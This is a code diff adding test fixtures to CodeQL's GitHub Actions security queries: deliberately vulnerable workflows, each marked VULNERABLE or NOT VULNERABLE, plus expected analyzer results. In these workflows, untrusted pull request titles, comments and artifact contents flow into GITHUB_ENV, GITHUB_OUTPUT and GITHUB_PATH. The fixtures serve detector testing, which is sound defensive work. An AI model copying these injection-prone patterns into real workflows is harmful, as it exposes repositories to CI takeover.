.github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | provenance | | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | provenance | | +nodes +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | jobs.job1.outputs.job-output1 | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | semmle.label | Job outputs node [job-output1] | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | semmle.label | steps.step1.outputs.step-output | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | +subpaths +#select +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref new file mode 100644 index 000000000000..3547c8a4d07d --- /dev/null +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref @@ -0,0 +1,2 @@ +Models/ReusableWorkflowsSummaries.ql + diff --git a/actions/ql/test/query-tests/Models/action1/action.yml b/actions/ql/test/query-tests/Models/action1/action.yml new file mode 100644 index 000000000000..787fb9f588be --- /dev/null +++ b/actions/ql/test/query-tests/Models/action1/action.yml @@ -0,0 +1,51 @@ +name: 'Hello World' +description: 'Greet someone' +inputs: + who-to-greet: # id of input + description: 'Who to greet' + required: true + default: 'World' +outputs: + reflected: + description: "Reflected input" + value: ${{ steps.reflector.outputs.reflected }} + tainted: + description: "Reflected input" + value: ${{ steps.source.outputs.tainted}} + +runs: + using: "composite" + steps: + - name: Secure Set Greeting + run: echo "Hello $INPUT_WHO_TO_GREET." + shell: bash + env: + INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} + - name: Remove foo + id: replace + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ inputs.who-to-greet }} + find: 'foo' + replace: '' + - id: sink + run: echo ${{ steps.replace.outputs.value }} + shell: bash + - name: Vulnerable Set Greeting + run: echo "Hello ${{ inputs.who-to-greet }}." + shell: bash + - id: reflector + run: echo "reflected=$(echo $INPUT_WHO_TO_GREET)" >> $GITHUB_OUTPUT + shell: bash + env: + INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} + - id: changed-files + uses: tj-actions/changed-files@v40 + - id: source + run: echo "tainted=$(echo $TAINTED)" >> $GITHUB_OUTPUT + shell: bash + env: + TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} + + + diff --git a/actions/ql/test/query-tests/Placeholder/.github/workflows/shell.yml b/actions/ql/test/query-tests/Placeholder/.github/workflows/shell.yml deleted file mode 100644 index 9392b81c6ab2..000000000000 --- a/actions/ql/test/query-tests/Placeholder/.github/workflows/shell.yml +++ /dev/null @@ -1,23 +0,0 @@ -on: push - -jobs: - job1: - runs-on: ubuntu-latest - steps: - - shell: pwsh - run: Write-Output "foo" - job2: - runs-on: ubuntu-latest - steps: - - run: echo "foo" - - job3: - runs-on: windows-latest - steps: - - shell: bash - run: echo "foo" - job4: - runs-on: windows-latest - steps: - - run: Write-Output "foo" - diff --git a/actions/ql/test/query-tests/Placeholder/Placeholder.expected b/actions/ql/test/query-tests/Placeholder/Placeholder.expected deleted file mode 100644 index 82fd180be661..000000000000 --- a/actions/ql/test/query-tests/Placeholder/Placeholder.expected +++ /dev/null @@ -1 +0,0 @@ -| .github/workflows/shell.yml:0:0:0:0 | .github/workflows/shell.yml | Analyzed a file. | diff --git a/actions/ql/test/query-tests/Placeholder/Placeholder.qlref b/actions/ql/test/query-tests/Placeholder/Placeholder.qlref deleted file mode 100644 index 2ad15e688e23..000000000000 --- a/actions/ql/test/query-tests/Placeholder/Placeholder.qlref +++ /dev/null @@ -1 +0,0 @@ -Placeholder.ql diff --git a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml new file mode 100644 index 000000000000..01036f711481 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml @@ -0,0 +1,39 @@ +on: + issue_comment: +jobs: + test1: + runs-on: ubuntu-latest + steps: + - id: clob1 + env: + BODY: ${{ github.event.comment.body }} + run: | + # VULNERABLE + echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT + echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT + - id: clob2 + run: | + echo ${{ steps.clob1.outputs.OUTPUT_1 }} + echo ${{ steps.clob1.outputs.OUTPUT_2 }} + test2: + runs-on: ubuntu-latest + steps: + - id: clob1 + env: + BODY: ${{ github.event.comment.body }} + run: | + # NOT VULNERABLE + echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT + test3: + runs-on: ubuntu-latest + steps: + - name: Download artifact + uses: dawidd6/action-download-artifact@v6 + with: + run_id: ${{ github.event.workflow_run.id }} + name: pr_number + - id: clob1 + run: | + # VULNERABLE + echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT + echo "OUTPUT_2=$(> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml new file mode 100644 index 000000000000..614de61b0cb7 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml @@ -0,0 +1,62 @@ +on: + issue_comment: +jobs: + test1: + runs-on: ubuntu-latest + steps: + - id: clob1 + env: + BODY: ${{ github.event.comment.body }} + run: | + # VULNERABLE + echo $BODY + echo "::set-output name=OUTPUT::SAFE" + - id: clob2 + env: + BODY: ${{ github.event.comment.body }} + run: | + # VULNERABLE + echo "::set-output name=OUTPUT::SAFE" + echo $BODY + - id: clob3 + run: | + echo ${{ steps.clob1.outputs.OUTPUT }} + test2: + runs-on: ubuntu-latest + steps: + - id: clob1 + env: + BODY: ${{ github.event.comment.body }} + run: | + # NOT VULNERABLE + echo "::set-output name=OUTPUT::SAFE" + test3: + runs-on: ubuntu-latest + steps: + - name: Download artifact + uses: dawidd6/action-download-artifact@v6 + with: + run_id: ${{ github.event.workflow_run.id }} + name: pr_number + - id: clob1 + run: | + # VULNERABLE + PR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | Config | +| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | Config | +| .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | semmle.label | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | semmle.label | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:36:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$( { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh + shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml b/actions/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml new file mode 100644 index 000000000000..0c2059521020 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml @@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip -d /tmp/artifacts + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh /tmp/artifacts + shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml new file mode 100644 index 000000000000..71f590fbc9c7 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml @@ -0,0 +1,20 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml new file mode 100644 index 000000000000..e4845a6f2f16 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml @@ -0,0 +1,26 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" + cat foo >> "$GITHUB_ENV" + echo "EOF" >> "${GITHUB_ENV}" + + + + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml new file mode 100644 index 000000000000..67209267b5c5 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + + + + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml new file mode 100644 index 000000000000..af9f01b572f1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml @@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml new file mode 100644 index 000000000000..e35bc73c3bda --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml @@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact-2 + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml new file mode 100644 index 000000000000..d22f09c03bdb --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml @@ -0,0 +1,33 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + + - run: echo "${{ github.event.pull_request.title }}" >> $GITHUB_PATH + - env: + PATHINJ: ${{ github.event.pull_request.title }} + run: echo $(echo "$PATHINJ") >> $GITHUB_PATH + - env: + PATHINJ: ${{ github.event.pull_request.title }} + run: echo $PATHINJ >> $GITHUB_PATH + - env: + PATHINJ: ${{ github.event.pull_request.title }} + run: echo ${PATHINJ} >> $GITHUB_PATH + - uses: dawidd6/action-download-artifact@v2 + with: + name: artifact_name + path: foo + - run: echo "$(cat foo/bar)" >> $GITHUB_PATH + - env: + ACTIONS_ALLOW_UNSECURE_COMMANDS: true + PATHINJ: ${{ github.event.pull_request.title }} + run: echo "::add-path::$PATHINJ" + + + + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml new file mode 100644 index 000000000000..8ca103cbb6a1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml @@ -0,0 +1,15 @@ +name: Test + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Code Injection, do not report as ENV VAR INJ + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + - name: Code Injection, do not report as ENV VAR INJ + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.head.ref }}") >> $GITHUB_ENV + + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml new file mode 100644 index 000000000000..f43a12cb42a3 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml @@ -0,0 +1,28 @@ +name: Build and Dockerize + +on: + pull_request_target: + +jobs: + build: + name: Test + runs-on: ubuntu-latest + steps: + - name: Decide Which 'ref' To Checkout + id: decide-ref + run: | + if [[ "${{github.event_name}}" == "pull_request_target" ]]; then + echo "ref=refs/pull/${{ github.event.pull_request.number }}/merge" >> $GITHUB_OUTPUT + else + echo "ref=${{github.ref}}" >> $GITHUB_OUTPUT + fi + + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{steps.decide-ref.outputs.ref}} + path: "foo" + + - name: Read Java Config + run: cat foo/.github/java-config.env >> $GITHUB_ENV + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml new file mode 100644 index 000000000000..5edd526d8201 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml @@ -0,0 +1,28 @@ +name: Write prerelease comment + +on: + workflow_run: + workflows: ["Create Pull Request Prerelease"] + types: + - completed + +jobs: + comment: + if: ${{ github.repository_owner == 'foo' }} + runs-on: ubuntu-latest + name: Write comment to the PR + steps: + - name: "Download runtime versions" + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: runtime-versions.md + + - name: "Put runtime versions on the environment" + id: runtime_versions + run: | + { + echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml new file mode 100644 index 000000000000..3a0c4cc91b82 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml @@ -0,0 +1,80 @@ +name: Write prerelease comment + +on: + workflow_run: + workflows: ["Create Pull Request Prerelease"] + types: + - completed + +jobs: + comment: + runs-on: ubuntu-latest + name: Write comment to the PR + steps: + - name: "Put PR and workflow ID on the environment" + uses: actions/github-script@v7 + with: + script: | + // Copied from .github/extract-pr-and-workflow-id.js + const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + + for (const artifact of allArtifacts.data.artifacts) { + // Extract the PR number from the artifact name + const match = /^npm-package-(.+)-(\d+)$/.exec(artifact.name); + if (match) { + const packageName = match[1].toUpperCase(); + require("fs").appendFileSync( + process.env.GITHUB_ENV, + `\nWORKFLOW_RUN_PR_FOR_${packageName}=${match[2]}` + + `\nWORKFLOW_RUN_ID_FOR_${packageName}=${context.payload.workflow_run.id}` + ); + } + } + + - name: "Download runtime versions" + # Regular `actions/download-artifact` doesn't support downloading + # artifacts from another workflow + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: runtime-versions.md + + - name: "Put runtime versions on the environment" + id: runtime_versions + run: | + { + echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + + - name: "Download pre-release report" + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: prerelease-report.md + + - name: "Put pre-release report on the environment" + id: prerelease_report + run: | + { + echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" + + - name: "Comment on PR with Wrangler link" + uses: marocchino/sticky-pull-request-comment@v2 + with: + number: ${{ env.WORKFLOW_RUN_PR_FOR_WRANGLER }} + message: | + ${{ env.PRERELEASE_REPORT }} + + --- + + ${{ env.RUNTIME_VERSIONS }} + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml new file mode 100644 index 000000000000..78d288fb9822 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml @@ -0,0 +1,23 @@ +name: publish +on: + pull_request_target: + branches: + - main +jobs: + need-publish: + permissions: + actions: write + name: Need Publish + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Get commit message + run: | + COMMIT_MESSAGE=$(git log --format=%s) + echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV + - name: Get commit message + run: | + echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml new file mode 100644 index 000000000000..93854c5e889f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml @@ -0,0 +1,30 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + test2: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + + + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml new file mode 100644 index 000000000000..89ecd8c0ec3e --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml @@ -0,0 +1,29 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - id: title + run: | + echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" + - run: echo "$TITLE" + test2: + runs-on: ubuntu-latest + steps: + - id: title + run: | + PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH}) + echo "BODY=$PR_BODY" >> "$GITHUB_ENV" + - run: echo "$TITLE" + test3: + runs-on: ubuntu-latest + steps: + - run: | + echo "branch_name=$(jq --raw-output .pull_request.head.ref $GITHUB_EVENT_PATH)" >> $GITHUB_ENV + + + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml new file mode 100644 index 000000000000..efcfda0e4c76 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml @@ -0,0 +1,35 @@ +name: Pull Request Open + +on: + workflow_run: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - name: Download PR metadata + uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + name: pr_metadata + - run: | + # VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV + - run: | + # VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr '\n' ' ')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr -d '\n')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr -cd '[:alpha:]_')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tail -n 1)" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | head -n 1)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml new file mode 100644 index 000000000000..dbf8c94b308f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml @@ -0,0 +1,36 @@ +on: + push: + branches: [main] + workflow_dispatch: + inputs: + pypi: + type: boolean + description: Publish + +jobs: + publish: + runs-on: ubuntu-latest + permissions: + id-token: write + steps: + - name: Checkout code + uses: actions/checkout@v4 + with: + token: ${{ secrets._GITHUB_TOKEN }} + - name: Extract PR Details + env: + GH_TOKEN: ${{ secrets._GITHUB_TOKEN }} + run: | + # Check if the event is a pull request or pull_request_target + if [ "${{ github.event_name }}" = "pull_request" ] || [ "${{ github.event_name }}" = "pull_request_target" ]; then 